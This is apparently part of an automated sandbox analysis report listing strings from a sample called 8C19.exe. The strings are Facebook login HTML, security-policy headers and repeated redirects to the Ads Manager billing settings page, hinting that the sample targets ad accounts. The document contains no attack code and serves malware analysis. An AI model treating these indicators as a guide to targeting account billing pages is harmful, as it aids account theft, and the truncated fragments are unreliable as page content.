                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_DCIoZ9fhhuS sx_1132bf"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3bs_3b3oropaiNizHihK1qoACXlhGwpb-zbShway7vBhu84U5eApA7CSereXftDmS6VkD2IT5gJ-7fU0IWQFRdA3AxCPxra__gax5cQ2w7i7qEBYYPBx110CkNlZ-BWi6Xk2kNxWErd2iyL2HaHg" title="Check out Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
                Source: 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.533047658.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535847326.000000000239E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"> equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;en_US&quot;, &quot;https:\/\/zh-cn.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)"> equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="BgTs8qFM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJzO4","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bejQ","isCQuick":false});</script><script nonce="BgTs8qFM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="BgTs8qFM"></style><script nonce="BgTs8qFM">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Facc equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.547903273.00000000023D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="BgTs8qFM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJzO4","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bejQ","isCQuick":false});</script><script nonce="BgTs8qFM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="BgTs8qFM"></style><script nonce="BgTs8qFM">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" / equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="BgTs8qFM">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJzO4","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bejQ","isCQuick":false});</script><script nonce="BgTs8qFM">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="BgTs8qFM"></style><script nonce="BgTs8qFM">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/ZVO5s7NaGvm.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Z6KNn4Q" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="xFgijA3d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJjS0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bcdI","isCQuick":false});</script><script nonce="xFgijA3d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="xFgijA3d"></style><script nonce="xFgijA3d">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/dat equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="xFgijA3d">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjm4PeMFcokJAYJjS0","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5dnxsGFAxPR8-bcdI","isCQuick":false});</script><script nonce="xFgijA3d">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="xFgijA3d"></style><script nonce="xFgijA3d">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/ZVO5s7NaGvm.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Z6KNn4Q" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @www.facebook.com equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @www.facebook.com!g equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400X-FB-DebugwkwDdbqHVYC0lJuMZMqvdb71pi3WsKpwDI5OfXzFsujeGWPmeSQ+cXUBjSpAdaDcsqDNM5cLgeTe1kYxcrXaqQ==X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topcontent-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;content-security-policy-report-onlydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveMon, 17 Oct 2022 20:07:01 GMTDateProxy-Conn
                Source: 8C19.exe, 0000000A.00000003.537557430.000000000237A000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: E)https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: EjSKTGrUfh8PuK3wJWwRknMt6z-ns8V38GHvMcdExgbIP4ZHOtmKw\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&amp;h=AT2gvp-_yMyq0o_PKlQUNFTDSPC8h26_F_aVw55xSk372ft57jOmQ76xPbV4hs0VWoP6aLVSdFVA9rbSZGrK7M0VGejDndC20p5OwkFzU3rXY0p1sErSaedQ_Wz-Ihourhd_9xuSTBAVz5581Oow0A\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance of Canada\u003C\/a> in Canada or the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fwww.youronlinechoices.com\u00252F&amp;h=AT066iXDlITwSDkNs equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547934832.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Host: www.facebook.com equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.534980843.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.536124394.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.522569046.00000000023E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Hostwww.facebook.com equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.533912561.00000000023CF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534957053.00000000023D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ^hp?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing= equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.534860765.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: _.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: _www.facebook.com equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;it_IT&quot;, &quot;en_US&quot;, &quot;https:\/\/it-it.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;pt_PT&quot;, &quot;en_US&quot;, &quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Portuguese (Portugal)">Portugu equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
